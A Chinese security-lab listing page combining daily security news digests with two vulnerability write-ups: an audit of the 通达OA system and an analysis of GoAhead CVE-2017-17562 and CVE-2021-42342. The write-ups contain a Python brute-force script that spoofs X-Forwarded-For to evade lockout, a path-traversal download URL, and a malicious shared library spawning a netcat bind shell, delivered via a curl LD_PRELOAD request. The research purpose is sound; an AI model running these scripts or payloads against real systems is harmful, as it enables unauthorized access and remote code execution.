网络安全日报 2022年09月06日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、QNAP 警告利用零日漏洞的新 Deadbolt 勒索软件攻击 https://securityaffairs.co/wordpress/135347/malware/qnap-deadbolt-ransomware-new-attacks.html 2、研究人员发现了一种新的可绕过MFA的网钓即服务 (PhaaS):EvilProxy https://securityaffairs.co/wordpress/135318/cyber-crime/evilproxy-phishing-as-a-service.html 3、CVERC发布西北工业大学遭美国NSA网络攻击事件调查报告 https://www.cverc.org.cn/head/zhaiyao/news20220905-NPU.htm 4、研究人员在Google Play发现升级后的SharkBot恶意软件 https://www.bleepingcomputer.com/news/security/sharkbot-malware-sneaks-back-on-google-play-to-steal-your-logins/ 5、反电信网络诈骗法表决通过,12月 1 日起施行 https://www.cnbeta.com/articles/tech/1311585.htm 6、Neopets 称黑客进入其系统达 18 个月之久 https://www.bleepingcomputer.com/news/security/neopets-says-hackers-had-access-to-its-systems-for-18-months/ 7、因印度的新网络安全规定,主要 VPN 服务商关闭印度服务器 https://www.solidot.org/story?sid=72652 8、2022 年国家网络安全宣传周将于 9 月 5 日至 11 日举行 https://www.secrss.com/articles/46488 9、美国警方被曝利用 Fog Reveal 收集的应用数据展开大规模监视 https://www.cnbeta.com/articles/tech/1311597.htm 10、TikTok否认数据泄露,据称暴露了超过20亿用户的信息 https://thehackernews.com/2022/09/tiktok-denies-data-breach-reportedly.html
网络安全日报 2022年09月05日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、KeyBank 的用户个人数据遭黑客窃取 https://www.securityweek.com/keybank-hackers-third-party-provider-stole-customer-data 2、一种新的网络钓鱼诈骗针对美国运通持卡人 https://securityaffairs.co/wordpress/135292/hacking/phishing-scam-targets-american-express.html 3、黑客入侵了 Yandex Taxi 应用,导致莫斯科出现大规模交通拥堵 https://securityaffairs.co/wordpress/135280/hacktivism/anonyomus-hacked-yandex-taxi.html 4、美国国税局 (IRS) 泄露了大约 12万名纳税人的机密信息 https://securityaffairs.co/wordpress/135271/security/irs-data-leak.html 5、BlackCat 勒索软件攻击了意大利能源机构GSE https://www.bleepingcomputer.com/news/security/blackcat-ransomware-claims-attack-on-italian-energy-agency/ 6、CodeRAT远控木马的源代码已在GitHub上泄露 https://www.bleepingcomputer.com/news/security/malware-dev-open-sources-coderat-after-being-exposed/ 7、Damart服装公司遭Hive勒索软件攻击 https://www.bleepingcomputer.com/news/security/damart-clothing-store-hit-by-hive-ransomware-2-million-demanded/ 8、Chrome修复了新的零日漏洞CVE-2022-3075 https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-new-zero-day-used-in-attacks/ 9、Contec Healthcare生命体征患者监护仪中发现多个漏洞 https://www.hipaajournal.com/multiple-vulnerabilities-identified-in-contec-health-vital-signs-patient-monitors/ 10、三星披露称7月遭受黑客攻击导致客户信息泄露 https://www.bleepingcomputer.com/news/security/samsung-discloses-data-breach-after-july-hack/
网络安全日报 2022年09月02日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、赛门铁克在1800多个移动应用中发现了硬编码的 AWS 凭证 https://www.securityweek.com/hardcoded-aws-credentials-1800-mobile-apps-highlight-supply-chain-issues 2、Ragnar Locker勒索软件团伙攻击和窃取了葡萄牙TAP航空公司数据 https://www.securityweek.com/ransomware-gang-claims-customer-data-stolen-tap-air-portugal-hack 3、苹果发布了最近披露的旧款iPhone和iPad的WebKit零日补丁 https://securityaffairs.co/wordpress/135136/security/apple-security-flaws-iphone.html 4、研究人员披露了新兴的跨平台BianLian勒索软件攻击 https://thehackernews.com/2022/09/researchers-detail-emerging-cross.html 5、高度规避的 Magecart JavaScript Skimmer 在野外活跃 https://blog.cyble.com/2022/09/01/highly-evasive-magecart-javascript-skimmer-active-in-the-wild/ 6、《最终幻想 14》玩家受到了二维码钓鱼攻击 https://www.malwarebytes.com/blog/news/2022/08/final-fantasy-14-players-targeted-by-qr-code-phishing 7、骗子越来越多地瞄准DeFi平台来窃取加密货币 https://securityaffairs.co/wordpress/135017/cyber-crime/fbi-warns-defi-attacks.html 8、2022上半年IoT漏洞披露的增加,环比增长57% https://www.helpnetsecurity.com/2022/08/29/vulnerability-disclosures-iot-devices/ 9、TikTok曝高危漏洞允许一键式帐户劫持,回应称已修复 https://www.freebuf.com/articles/343500.html 10、WatchGuard 防火墙漏洞允许设备被接管 https://portswigger.net/daily-swig/watchguard-firewall-exploit-threatens-appliance-takeover
某OA系统审计小记
通达oa 作为攻防演练中出场率较高的一套 OA 系统,决定先从历史漏洞开始挖掘分析,对通达oa 有一个初步的了解。 通达oa 11.9 的https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe ,默认安装地址是 D:\MYOA ,联网状态下会自动更新到通达 oa 11.10 安装成功后,登录界面如下 默认账号为 admin 对应密码为空。 登录后我们看到其中还有一些默认账号 lijia wangyun wangde 均可利用空密码登录成功    爆破密码 正常输入账号名密码时,输入三次错误就会禁止10分钟 我们可以通过代码方面追究其原因 webroot/inc/td_core.php $USER_IP 的值可以来自于 X-Forwarded-For 写个 python 脚本用于爆破用户名密码 import requests import sys import re def read_passwd(passwordfile):    with open(file = passwordfile, mode='r') as f:        passwd = f.read().splitlines()        return passwd def Intruder_password(url,username,passwd_list):    success_str ="正在进入OA系统,请稍候..."    a=b=c=d=0    url = url +"/logincheck.php"    for passwd in passwd_list:        payload = "UNAME={}&PASSWORD={}&encode_type=1".format(username,passwd)        headers = { "X-Forwarded-For": "{}.{}.{}.{}".format(a,b,c,d),"Content-Type": "application/x-www-form-urlencoded"}        response = requests.request("POST", url, data=payload, headers=headers)        if(re.search(success_str, response.text)):            print("正确的账号名:{}密码:{}".format(username,passwd))        else:            print("错误密码:{}".format(passwd))        d=d+1        if(d == 255):            c = c +1            d = 0        if(c == 255):            b = b +1            c = 0        if(b == 255):            a = a +1            b =0 def main():    if len(sys.argv) < 4:        print("Usage: Intruder_password.py targeturl username passwdfile\n"              "Example: python Intruder_password.py http://10.0.18.1:80 admin passwd.txt")        exit()    url = sys.argv[1]    username = sys.argv[2]    passwd_list = read_passwd(sys.argv[3])    Intruder_password(url,username,passwd_list) if __name__ == '__main__':    main() 未授权敏感信息泄露 一般我们想要寻找一些高危的漏洞,就是需要寻找一些未授权漏洞,就是在未登录状态下也可以执行授权后的相关功能,编写了一个简单的脚本,先判断哪一些网页是可以在未授权的情况下进行访问到,然后再做进一步的分析 import os import sys import requests def file_path(url,filefolder):    for root, dirs, files in os.walk(filefolder):        for f in files:            paths = os.path.join(root,f)            paths = paths.replace(filefolder,url)            paths = paths.replace("\\","/")            #print(paths)            if(f.endswith(".php")):                response = requests.get(paths)                # print(str(response.status_code)+" "+str(len(response.text))+" "+paths)                print("code:"+ str(response.status_code) +" len:"+ str(len(response.text))+" url: "+ paths ) def main():    if len(sys.argv) < 3:        print("Usage: file_path.py targeturl filefolder\n"              "Example: python file_path.py http://10.0.18.1:80 \"C:\\Users\\admin\\Desktop\\MYOA\\webroot\"")        exit()    url = sys.argv[1]    filefolder = sys.argv[2]    file_path(url,filefolder) if __name__ == '__main__':    main() http://10.0.18.1/inc/reg.php 泄露版本信息 还有很多可以未授权显示的页面,不一一展示了 未授权文件下载 通过不断测试,也找到了一个比较有价值的漏洞,就是未授权文件下载 构造链接 http://10.0.18.1/inc/package/down.php?id=/../../../../../../../../../a   就可以下载到根目录下的 a.zip 文件 我们从代码层面分析一下漏洞的成因 webroot/inc/package/down.php 我们看到通过 GET 方法获取到 id 值,拼接到 $FILE_PATH 中,并没有做任何过滤,传到函数 td_download 中 webroot/inc/utility_file.php 如此便实现了任意文件下载,这是在版本 11.09 中 存在的漏洞,在自动更新到 11.10 后 漏洞便被修复了,我们查看一下代码 webroot/inc/package/down.php 我们看到对传入的参数进行了过滤,无法再跨越目录的进行下载 靶场实验练习推荐: https://www.yijinglab.com/expc.do?ec=ECIDb9ac-4540-46b4-b676-22df36b5935b
网络安全日报 2022年09月01日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、WordPress 6.0.2 修补可能影响数百万旧网站的漏洞 https://www.securityweek.com/wordpress-602-patches-vulnerability-could-impact-millions-legacy-sites 2、Chrome 发布105版本,修补多个高危漏洞 https://www.securityweek.com/chrome-105-patches-critical-high-severity-vulnerabilities 3、TikTok Android 应用中的一个漏洞可能允许劫持用户的帐户 https://securityaffairs.co/wordpress/135125/mobile-2/tiktok-android-app-bug.html 4、意大利石油巨头 ENI 公司网络遭入侵 https://securityaffairs.co/wordpress/135116/hacking/eni-suffered-cyberattack.html 5、俄罗斯流媒体平台 Start 披露了影响 750 万用户的数据泄露事件 https://securityaffairs.co/wordpress/135069/data-breach/start-data-breach.html 6、攻击者利用ModernLoader传播挖矿程序及RedLine窃密木马 https://thehackernews.com/2022/08/hackers-use-modernloader-to-infect.html 7、研究人员设计基于图的算法发现了180个Node.js相关漏洞 https://www.securityweek.com/academics-devise-open-source-tool-hunting-nodejs-security-flaws 8、黑客利用韦伯望远镜拍摄的图像传播恶意软件 https://securityaffairs.co/wordpress/135090/malware/gowebbfuscator-james-webb-space-telescope.html 9、美国陆军本周宣布对外招募网络战部队人员 https://www.secrss.com/articles/46345 10、Google Play 禁止 VPN 应用屏蔽广告 https://www.solidot.org/story?sid=72614
网络安全日报 2022年08月30日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、谷歌为开源项目启动漏洞赏金计划 https://www.securityweek.com/google-launches-bug-bounty-program-open-source-projects 2、全球最大图书发行商 Baker & Taylor 遭勒索软件攻击 https://securityaffairs.co/wordpress/135026/cyber-crime/baker-taylor-ransomware.html 3、CSTIS发布关于畅捷通T+漏洞造成勒索攻击隐患的风险提示 https://mp.weixin.qq.com/s/Y4sd7vwOGhQe0S3XM5wgWw 4、Borat RAT恶意软件同时具备远控、勒索及窃密功能 https://cyware.com/news/borat-rat-this-unique-triple-threat-is-one-nasty-package-df572aa4 5、国家卫健委等三部门发布《医疗卫生机构网络安全管理办法》 https://www.freebuf.com/news/343278.html 6、软件公司老板黑进40多家金融机构 盗指令炒股赚百万获刑 https://www.cnbeta.com/articles/tech/1309769.htm 7、因涉嫌未经同意收集人脸信息,Snap 以 2.4 亿元达成和解 https://www.secrss.com/articles/46298 8、累计被安装了 140 万次的5个 Chrome 扩展程序窃取用户数据 https://www.bleepingcomputer.com/news/security/chrome-extensions-with-14-million-installs-steal-browsing-data/ 9、美国外卖巨头DoorDash发生数据泄露事件 https://www.ithome.com/0/637/455.htm 10、北约对黑客在暗网中出售欧洲导弹集团涉密文件的情况进行调查 https://www.secrss.com/articles/46285
网络安全日报 2022年08月30日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员在数以万计的 WordPress 网站上发现了恶意插件 https://www.securityweek.com/malicious-plugins-found-25000-wordpress-websites-study 2、JFrog 研究员披露了影响 OPC UA 协议的多个漏洞的详细信息 https://www.securityweek.com/details-disclosed-opc-ua-vulnerabilities-exploited-ics-hacking-competition 3、美国 FTC 起诉数据分析公司 Kochava 出售敏感和地理位置数据 https://securityaffairs.co/wordpress/135004/security/ftc-sued-data-broker-kochava.html 4、自 2019 年以来,Nitrokod 挖矿软件感染了 11 个国家/地区的系统 https://securityaffairs.co/wordpress/134985/cyber-crime/nitrokod-crypto-miner-campaign.html 5、Akasa Air 遭受影响乘客个人信息的数据泄露 https://www.indiatoday.in/india/story/akasa-airlines-data-breach-passengers-personal-information-leaked-1993723-2022-08-29 6、LockBit勒索组织称未来将采用三重勒索策略 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/ 7、研究发现 Google 追踪 39 种个人数据,苹果追踪 12 种 https://www.cnbeta.com/articles/tech/1308685.htm 8、工信部通报 47 款侵害用户权益 App 和 SDK,包括神州专车、虎扑等 https://www.ithome.com/0/637/267.htm 9、Foxmail 邮件客户端曝逻辑漏洞:一次点击即可命令执行 https://www.secrss.com/articles/46233 10、疑似借助用友畅捷通T+的勒索攻击爆发 https://www.huorong.cn/info/1661778944884.html
网络安全日报 2022年08月29日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Atlassian 针对高危 Bitbucket 漏洞发布紧急补丁 https://www.securityweek.com/atlassian-ships-urgent-patch-critical-bitbucket-vulnerability 2、黑山国家基础设施遭到大规模“前所未有的”网络攻击 https://securityaffairs.co/wordpress/134900/cyber-warfare-2/montenegro-cyber-attack.html 3、攻击者滥用 Genshin Impact Anti-Cheat 驱动程序来禁用防病毒软件 https://securityaffairs.co/wordpress/134884/malware/anti-cheat-driver-disable-antivirus.html 4、Mercury APT 利用 SysAid 应用中的 Log4Shell 漏洞进行初始访问 https://securityaffairs.co/wordpress/134876/apt/mercury-exploit-log4shell-flaw.html 5、攻击Twilio、Cloudflare的黑客还攻击了其他 130 多个组织 https://www.securityweek.com/twilio-cloudflare-attacked-part-campaign-hit-over-130-organizations 6、Oracle SBC的漏洞可导致未授权访问或拒绝服务 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/oracle-sbc-multiple-security-vulnerabilities-leading-to-unauthorized-access-and-denial-of-service/ 7、Binance高管声称黑客使用他的"Deepfake"视频来欺骗用户 https://www.euronews.com/next/2022/08/24/binance-executive-says-scammers-created-deepfake-hologram-of-him-to-trick-crypto-developer 8、Cyble称当下航空业是较易被作为攻击目标的行业 https://blog.cyble.com/2022/08/26/aviation-travel-industry-recovering-from-covid-turbulence-grounded-by-cyberattacks/ 9、TeamTNT已对云实例及容器环境实施了超过两年的攻击 https://www.infosecurity-magazine.com/news/teamtnt-targeted-cloud-instances/ 10、一个名为 Agenda 的新勒索软件针对亚洲和非洲的组织 https://securityaffairs.co/wordpress/134911/cyber-crime/agenda-ransomware.html
goahead环境变量注入漏洞分析
一、前言 1.1 下载地址 二、CVE-2017-17562 2.1 漏洞分析 cve-2017-17562远程命令执行漏洞影响Goahead 2.5.0到Goahead 3.6.5之间的版本。在cgiHandler函数中,将用户的HTTP请求参数作为环境变量,通过诸如LD_PRELOAD即可劫持进程的动态链接库,实现远程代码执行。 2.2 代码分析 漏洞成因位于cgiHandler函数中。代码首先拼接出用户请求的cgi完整路径并赋予cgiPath,然后检查此文件是否存在以及是否为可执行文件。随后就是存在漏洞的关键代码处,如下图所示: 代码将用户请求的参数存入环境变量数组envp中,但是不能为REMOTE_HOST和HTTP_AUTHORIZATION。从这里不难看出黑名单的过滤非常有限,这也为攻击者提供了利用点。 如下图所示代码继续往下执行,将webGetCgiCommName函数的返回值保存在stdIn与stdOut中,此函数将返回一个默认路径位于/tmp文件名格式cgi-*.tmp的绝对路径字符串。 随后代码将cgiPath、envp、stdIn与stdOut作为参数传入launchCgi函数中。 PUBLIC char *websGetCgiCommName() {   return websTempFile(NULL, "cgi"); } PUBLIC char *websTempFile(char *dir, char *prefix) {   static int count = 0;   char   sep;   sep = '/';   if (!dir || *dir == '\0') { #if WINCE       dir = "/Temp";       sep = '\\'; #elif ME_WIN_LIKE       dir = getenv("TEMP");       sep = '\\'; #elif VXWORKS       dir = "."; #else       dir = "/tmp"; #endif   }   if (!prefix) {       prefix = "tmp";   }   return sfmt("%s%c%s-%d.tmp", dir, sep, prefix, count++); } 进入launchCgi函数,根据注释可知此函数为cgi启动函数。代码首先打开了两个tmp文件,随后fork子进程并在子进程中将标准输入与标准输出重定向到两个打开的文件描述符上,最后调用execve函数在子进程中执行cgi程序。 至此漏洞相关代码分析完毕,代码在执行execve函数时将cgiHandler函数解析的envp数组作为第三个参数传入,攻击者可以在请求参数时通过LD_PRELOAD环境变量配合代码重定向后/proc/self/fd/0指向POST数据实现动态链接库的劫持。 2.3 漏洞复现 下载编译并通过gdb运行存在漏洞的Goahead程序(3.6.4) git clone https://github.com/embedthis/goahead.git cd goahead make cd test gcc ./cgitest.c -o cgi-bin/cgitest sudo gdb ../build/linux-x64-default/bin/goahead 编写恶意动态链接库,代码以及编译命令如下所示: #include <stdio.h> #include <stdlib.h> static void main(void) __attribute__((constructor)); static void main(void) { system("nc -lp 8888 -e /bin/sh"); } // gcc --shared -fPIC poc.c -o poc.so 构造HTTP请求发送 curl -vv -XPOST --data-binary @./poc.so localhost/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 断点下在execve函数处,此时内存情况如下图所示,envp数组中存在我们注入的恶意环境变量LD_PRELOAD并指向/proc/self/fd/0文件。在代码分析中我们了解到,launchCgi函数会在子进程中将标准输入输出重定向到cgi-*.tmp的文件描述符,而根据以往的经验POST数据会作为cgi的标准输入,也就是说此时/proc/self/fd/0所指向的正是我们的恶意文件poc.so,当execve函数执行时,即可劫持进程动态链接库实现RCE。 2.4 补丁分析 首先是在cgiHandler函数中添加了更加完整的过滤检测,使得LD_开头的字符串无法写入envp数组。 其次是增加了一层if判断,当s-arg不为0时进行字符串拼接。根据索引找到s-arg的赋值语句位于addFormVars函数中,此函数是Goahead处理content-type为application/x-www-form-urlencoded的HTTP请求时会调用。 三、cve-2021-42342 3.1 漏洞分析 cve-2021-42342远程命令执行漏洞影响Goahead 4.X和部分Goahead 5.X版本。在分析cve-2017-17562的补丁时我们了解到新版的程序对黑名单的完整性上做了优化,然而在4.X版本中增加了一句strim函数对用户参数的处理,如下图所示: 进入这个函数,当第二个参数为0时return 0。因为开发人员对于strim函数使用规范的错误使得针对cve-2017-17562的黑名单完善形同虚设。 上文在对cve-2017-17562补丁进行分析时曾经提到,s-arg在addFormVars函数中赋值为1,为了实现环境变量注入则必须使s-arg为0,绕过的方式也很简单令header中content-type为multipart/form-data即可。 后续利用方式与cve-2017-17562相同,笔者就不做重复分析了。 3.2 代码分析 为了更好的了解漏洞的完整执行流程,这里笔者针对Goahead处理Http的机制进行深入分析,其中不对的地方欢迎师傅们指正。 在Goahead进行启动后会执行websServer函数进行初始化操作。其中websOpen函数对route.txt文件进行解析,关于route处理可以看一下https://www.cnblogs.com/zongzi10010/p/12109380.html师傅的文章。 websOpen函数会根据配置启动相应的代码模块 其中关于cgi请求的回调函数通过websDefineHandler函数定义。 websOpen函数执行完毕后返回websServer函数并调用websListen启动HTTP服务。代码如下所示,当接收到HTTP请求时调用回调函数websAccept函数进行处理。 在websAccept函数中调用websAlloc函数为请求分配内存地址,添加入webs列表中。 其中websAlloc函数调用initWebs函数对Webs结构体进行初始化。 此时Goahead完成了对Http请求的初始化操作,而针对Http请求的处理工作则是通过执行websAccept->socketEvent->readEvent完成响应的 调用websRead函数将数据写入到wp->rxbuf缓冲区中,随后执行websPump函数。如下图所示,在Goahead中将HTTP的处理流程分为了五个状态,每个状态由不同的函数进行配置和处理工作。 3.2.1 WEBS_BEGIN WEBS_BEGIN阶段由parseIncoming函数负责处理,代码如下图所示。其中我们需要重点关注调用的三个函数parseFirstLine、parseHeaders、websRouteRequest函数。 parseFirstLine函数负责将请求的类型、url、协议版本和请求参数保存在wp结构体中  parseHeaders函数负责对请求头进行解析,其中对请求头中content-type键处理流程如下图所示。为了满足漏洞的触发条件s->arg为0,所以我们需要绕过addFormVars函数,即请求头content-type为multipart/form-data。 函数用于确定HTTP请求的处理函数。通过url路径与route->prefix进行比较确定最终处理函数,并将结果保存在wp->route中。其中routes数组保存了route.txt文件解析后,所有处理函数的相关数据。 调用websGetCgiCommName函数创建文件名格式为cgi-*.tmp的临时文件用于保存POST数据。 3.2.2 WEBS_CONTENT 返回websPump函数,随后调用processContent函数。函数部分代码如下所示,其中filterChunkData函数检测数据是否全部处理完毕,websProcessUploadData函数为处理上传文件的函数。 进入函数后可以看到上传操作被分为五个状态,每种状态由专门的函数负责处理,如下图所示。 initUpload函数切换wp->uploadState状态为initUpload,初始化上传路径并确定上传请求边界符。 processContentBoundary函数判断数据是否已经处理完毕,若是则将状态切换为UPLOAD_CONTENT_END,若还有数据未处理完成则切换状态为UPLOAD_CONTENT_HEADER。 processUploadHeader函数通过调用websTempFile函数创建用于暂存上传数据的临时文件,文件名格式/tmp/tmp-*.tmp,将临时文件的文件描述符保存在wp 当全部数据处理完毕后wp->eof置1,wp->state状态更改为WEBS_READY。 返回processContent函数后继续执行,调用websProcessCgiData函数将POST数据保存在临时文件cgi-*.tmp中 3.2.3 WEBS_READY 程序流程返回websPump函数后,在WEBS_READY阶段调用websRunRequest函数,此函数主要负责切换wp->state为WEBS_RUNNING,并调用cgiHandler函数。 在代码执行到漏洞位置时,s->arg值为零完成绕过。后续的利用原理与cve-2017-17562类似,这里就不过多赘述。
网络安全日报 2022年08月26日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、密码管理软件公司 LastPass 遭遇数据泄露,导致源代码被盗 https://www.securityweek.com/lastpass-says-source-code-stolen-data-breach 2、Intellexa公司以 800 万美元价格提供 iOS&Android 设备漏洞利用服务 https://www.securityweek.com/leaked-docs-show-spyware-firm-offering-ios-android-hacking-services-8-million 3、谷歌宣布开源"Paranoid"加密测试库 https://www.securityweek.com/google-open-sources-paranoid-crypto-testing-library 4、Mozilla 修补了 Firefox、Thunderbird 中的高危漏洞 https://www.securityweek.com/mozilla-patches-high-severity-vulnerabilities-firefox-thunderbird-0 5、Nobelium APT 使用新的入侵后恶意软件 MagicWeb https://securityaffairs.co/wordpress/134838/apt/nobelium-magicweb-tool.html 6、网络攻击者正在使用 Tox P2P 消息服务作为 C2 服务器 https://securityaffairs.co/wordpress/134806/malware/tox-p2p-c2-server.html 7、越来越多的攻击者利用 Sliver 工具包作为 Cobalt Strike 的替代品 https://www.bleepingcomputer.com/news/security/more-hackers-adopt-sliver-toolkit-as-a-cobalt-strike-alternative/ 8、研究人员发现了针对韩国政客和外交官的APT组织- Kimusky https://thehackernews.com/2022/08/researchers-uncover-kimusky-infra.html 9、Quantum勒索软件攻击了多米尼加共和国政府机构 https://www.bleepingcomputer.com/news/security/quantum-ransomware-attack-disrupts-govt-agency-in-dominican-republic/ 10、RansomEXX声称对庞巴迪娱乐公司进行勒索攻击 https://www.bleepingcomputer.com/news/security/ransomexx-claims-ransomware-attack-on-sea-doo-ski-doo-maker/
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页